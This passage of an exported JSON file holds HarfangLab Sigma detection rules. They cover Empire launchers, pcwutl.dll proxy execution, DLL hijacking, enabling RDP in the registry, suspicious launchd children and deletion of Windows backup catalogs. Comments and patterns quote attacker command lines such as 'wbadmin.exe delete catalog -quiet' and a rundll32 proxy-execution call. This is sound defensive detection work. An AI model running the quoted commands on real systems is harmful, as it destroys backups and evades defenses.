"rule_description": "Detects a PowerShell command line containing arguments related to the Empire attack framework launcher.\nAttackers may use Empire to maintain access to a compromised system.\nIt is recommended to investigate the newly created process for any suspicious activity.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d3f425bc-d72a-4f92-aae4-1d489631df7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080266Z",
"creation_date": "2026-03-23T11:45:34.080268Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080272Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/rundll32/",
"https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_pcwutl.yml",
"content": "title: Proxy Execution via pcwutl.dll\nid: d3f425bc-d72a-4f92-aae4-1d489631df7d\ndescription: |\n Detects a suspicious invocation of the LaunchApplication function from the legitimate windows library pcwutl.dll by rundll32 to launch a binary.\n Attackers may abuse this legitimate binary and function to bypass security restrictions.\n It is recommended to check activities made by the newly spawned process to determine the legitimacy of this action.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/rundll32/\n - https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/02/04\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Pcwutl\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe pcwutl.dll,LaunchApplication calc.exe\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_cmd:\n CommandLine|contains|all:\n - 'pcwutl.dll'\n - 'LaunchApplication'\n\n exclusion_pcwrun:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n # GrandparentImage: '?:\\Windows\\System32\\pcwrun.exe' # sometime this information is not present\n # C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW44A4.xml /skip TRUE\n # C:\\Windows\\System32\\msdt.exe -path C:\\Windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW4E0.xml /skip TRUE\n # C:\\WINDOWS\\System32\\msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\6\\PCW443D.xml /skip TRUE\n # C:\\Windows\\System32\\msdt.exe -path 
C:\\Windows\\diagnostics\\index\\PCWDiagnostic.xml -af d:\\profils\\xxx\\AppData\\Local\\Temp\\39\\PCWC040.xml /skip TRUE\n # C:\\Windows\\System32\\msdt.exe -path C:\\Windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Windows\\TEMP\\PCW4C65.xml /skip TRUE\n ParentCommandLine|contains: ' -path ?:\\windows\\diagnostics\\index\\PCWDiagnostic.xml'\n\n exclusion_pcwdiagnostic:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n ParentCommandLine|contains: ' -id PCWDiagnostic'\n\n exclusion_edge:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n CommandLine: '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n\n exclusion_micollab:\n CommandLine:\n - '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files\\Mitel\\MiCollab\\MiCollab.exe'\n - '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files (x86)\\Mitel\\MiCollab\\MiCollab.exe'\n\n exclusion_office:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files (x86)\\Microsoft Office\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files\\Microsoft Office\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d3f425bc-d72a-4f92-aae4-1d489631df7d",
"rule_name": "Proxy Execution via pcwutl.dll",
"rule_description": "Detects a suspicious invocation of the LaunchApplication function from the legitimate Windows library pcwutl.dll by rundll32 to launch a binary.\nAttackers may abuse this legitimate binary and function to bypass security restrictions.\nIt is recommended to check the activities performed by the newly spawned process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-02-04",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4448173-74b1-409b-b2ce-08cc7c899490",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090087Z",
"creation_date": "2026-03-23T11:45:34.090089Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090093Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netiougc.yml",
"content": "title: DLL Hijacking via netiougc.exe\nid: d4448173-74b1-409b-b2ce-08cc7c899490\ndescription: |\n Detects potential Windows DLL Hijacking via netiougc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netiougc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\dhcpcsvc.DLL'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4448173-74b1-409b-b2ce-08cc7c899490",
"rule_name": "DLL Hijacking via netiougc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netiougc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d44bbe66-0318-4453-a55b-35121e765bba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622320Z",
"creation_date": "2026-03-23T11:45:34.622321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622326Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_rdp_enabled_registry.yml",
"content": "title: Remote Desktop Logon Enabled in Registry\nid: d44bbe66-0318-4453-a55b-35121e765bba\ndescription: |\n Detects a registry modification enabling RDP connections to a machine.\n Once the service is enabled, adversaries may connect to a remote system over RDP/RDS with known credentials to obtain an interactive access to the host.\n It can also be used with the Accessibility Features technique (T1546.008) to obtain the System privileges if Network Level Authentication is disabled.\n It is recommended to investigate suspicious authentications over RDP after the service has been enabled.\nreferences:\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_reg:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections'\n - 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fDenyTSConnections'\n Details:\n - 'DWORD (0x00000000)'\n - 'QWORD (0x00000000-0x00000000)'\n\n selection_parent:\n # Parent information of a process can be missing.\n ProcessParentImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ui_settings:\n ProcessImage: '?:\\Windows\\System32\\SystemSettingsAdminFlows.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\SystemSettingsAdminFlows.exe RemoteDesktopTurnOnRdp'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_systemproperties:\n ProcessImage:\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n - '?:\\Windows\\System32\\SystemPropertiesAdvanced.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Windows\"\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_ccm:\n ProcessParentImage: '?:\\Windows\\CCM\\OSDRunPowerShellScript.exe'\n ProcessGrandparentImage: '?:\\Windows\\CCM\\TSManager.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_systancia:\n ProcessImage: '?:\\Program Files 
(x86)\\Systancia\\AppliDis\\AdisDesktopInfrastructure\\AdisVDIDesktopAgent\\AdisVDIDesktopAgent.exe'\n\n exclusion_altiris:\n ProcessGrandparentImage: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n exclusion_wapt:\n - ProcessImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - ProcessParentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - ProcessGrandparentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n exclusion_power_automate_custom_action:\n ProcessOriginalFileName: 'RUNDLL32.EXE'\n ProcessCommandLine|contains: 'Microsoft.Flow.UIflow.CustomActions.PermissionCustomActions.SetRDPConnectionsPermissions'\n\n exclusion_bmc:\n ProcessGrandparentImage:\n - '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n - '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxproxy.exe'\n\n exclusion_aws:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\AWS Replication Agent\\dist\\launch_convert.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d44bbe66-0318-4453-a55b-35121e765bba",
"rule_name": "Remote Desktop Logon Enabled in Registry",
"rule_description": "Detects a registry modification enabling RDP connections to a machine.\nOnce the service is enabled, adversaries may connect to a remote system over RDP/RDS with known credentials to obtain interactive access to the host.\nIt can also be combined with the Accessibility Features technique (T1546.008) to obtain SYSTEM privileges if Network Level Authentication is disabled.\nIt is recommended to investigate suspicious authentications over RDP after the service has been enabled.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d44c6de2-d37f-4e36-8fa1-f23231dd7632",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295355Z",
"creation_date": "2026-03-23T11:45:35.295359Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295366Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1543_004_launchd_susp_child.yml",
"content": "title: Suspicious Launchd Child Process\nid: d44c6de2-d37f-4e36-8fa1-f23231dd7632\ndescription: |\n Detects a suspicious process execution by launchd.\n Adversaries may install a persistence using a launch agent or daemon in order to keep remote access to a compromise asset between reboot.\n It is recommended to check the maliciousness of the executed file.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.001\n - attack.t1543.004\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n product: macos\n category: process_creation\ndetection:\n # Agents below 4.0.0 do not support signed MacOS processes, we need this for exclusion\n selection_agent_version:\n AgentVersion|gte|version: 4.0.0\n\n selection_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n selection_susp_hidden:\n ProcessName|startswith: '.'\n\n selection_susp_folder:\n Image|startswith:\n - '/Users/shared/'\n - '/private/tmp/'\n - '/private/var/folders/'\n - '/Library/Containers/'\n - '/private/var/root/'\n\n selection_susp_bin:\n Image|endswith: '/dseditgroup'\n\n selection_susp_shell:\n Image:\n - '/bin/sh'\n - '/bin/zsh'\n - '/bin/bash'\n CommandLine|contains:\n - 'curl '\n - 'base64 '\n - 'python '\n\n selection_signed:\n Signed: 'true'\n\n filter_adhoc_sig:\n CodesigningFlagsStr|contains: 'CS_ADHOC'\n\n exclusion_folder:\n Image|startswith:\n - '/private/var/folders/??/'\n - '/private/tmp/KSInstallAction.'\n - '/private/tmp/PKInstallSandbox.??????/'\n\n exclusion_libexec:\n 
CommandLine|contains:\n - '/usr/libexec/tmp_cleaner'\n - '/usr/libexec/gkreport'\n\n exclusion_asdf:\n CommandLine|contains: ' /opt/homebrew/opt/asdf/libexec/bin/asdf '\n\n exclusion_pm2:\n CommandLine: 'PM2 v*: God Daemon (/*/.pm2) SILENT=true'\n\n\n exclusion_flowjo:\n CommandLine|startswith: '/Applications/FlowJo.app/Contents/MacOS/flowjoJavaApplicationStub -c'\n\n exclusion_nix:\n Image:\n - '/bin/bash'\n - '/bin/sh'\n CommandLine|startswith: '/bin/sh -c exec /nix/store/'\n\n exclusion_xquartz:\n CommandLine|contains: '-c exec \"${@}\" - /Applications/Utilities/XQuartz.app/Contents/MacOS/X11.bin'\n\n exclusion_adobe:\n SignatureSigningId: 'com.adobe.*'\n Signed: 'true'\n\n exclusion_fiery:\n Image: '/private/tmp/Fiery Printer Driver Installer.app/Contents/Resources/User Software/OSX/Printer Driver/Installer Wizard.app/Contents/MacOS/Fiery Printer Driver Installer'\n Signed: 'true'\n\n exclusion_epic_games:\n Image|startswith: '/Users/Shared/Epic Games/'\n\n exclusion_parallels:\n Image|startswith: '/Users/Shared/Parallels/'\n\n condition: selection_launchd and selection_agent_version and 1 of selection_susp_* and not (1 of exclusion_* or (selection_signed and not filter_adhoc_sig))\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d44c6de2-d37f-4e36-8fa1-f23231dd7632",
"rule_name": "Suspicious Launchd Child Process",
"rule_description": "Detects a suspicious process execution by launchd.\nAdversaries may install a persistence using a launch agent or daemon in order to keep remote access to a compromise asset between reboot.\nIt is recommended to check the maliciousness of the executed file.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1543.001",
"attack.t1543.004",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d46896a1-b2db-4315-9403-87083d67a701",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080040Z",
"creation_date": "2026-03-23T11:45:34.080042Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080046Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_wbadmin_delete_catalog.yml",
"content": "title: Windows Backup Catalog Deleted\nid: d46896a1-b2db-4315-9403-87083d67a701\ndescription: |\n Detects when the wbadmin utility is used to delete Windows backup catalogs.\n This has been used by numerous malwares and ransomwares to hinder recovery methods.\n It is recommended to investigate the parent process and other detection on the host to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/10/08\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bcdedit:\n - Image|endswith: '\\wbadmin.exe'\n - OriginalFileName: 'WBADMIN.EXE'\n\n selection_cmdline_1:\n CommandLine|contains: 'delete'\n\n selection_cmdline_2:\n # https://blog.lexfo.fr/lockbit-malware.html\n # wbadmin.exe delete catalog -quiet\n # wbadmin DELETE SYSTEMSTATEBACKUP\n CommandLine|contains:\n - 'catalog'\n - 'SYSTEMSTATEBACKUP'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d46896a1-b2db-4315-9403-87083d67a701",
"rule_name": "Windows Backup Catalog Deleted",
"rule_description": "Detects when the wbadmin utility is used to delete Windows backup catalogs.\nThis has been used by numerous malwares and ransomwares to hinder recovery methods.\nIt is recommended to investigate the parent process and other detection on the host to determine if this action was legitimate.\n",
"rule_creation_date": "2020-10-08",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d48da338-7c83-49b0-b766-ffd14fb2048a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096573Z",
"creation_date": "2026-03-23T11:45:34.096575Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096579Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sysreseterr.yml",
"content": "title: DLL Hijacking via sysreseterr.exe\nid: d48da338-7c83-49b0-b766-ffd14fb2048a\ndescription: |\n Detects potential Windows DLL Hijacking via sysreseterr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sysreseterr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d48da338-7c83-49b0-b766-ffd14fb2048a",
"rule_name": "DLL Hijacking via sysreseterr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sysreseterr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
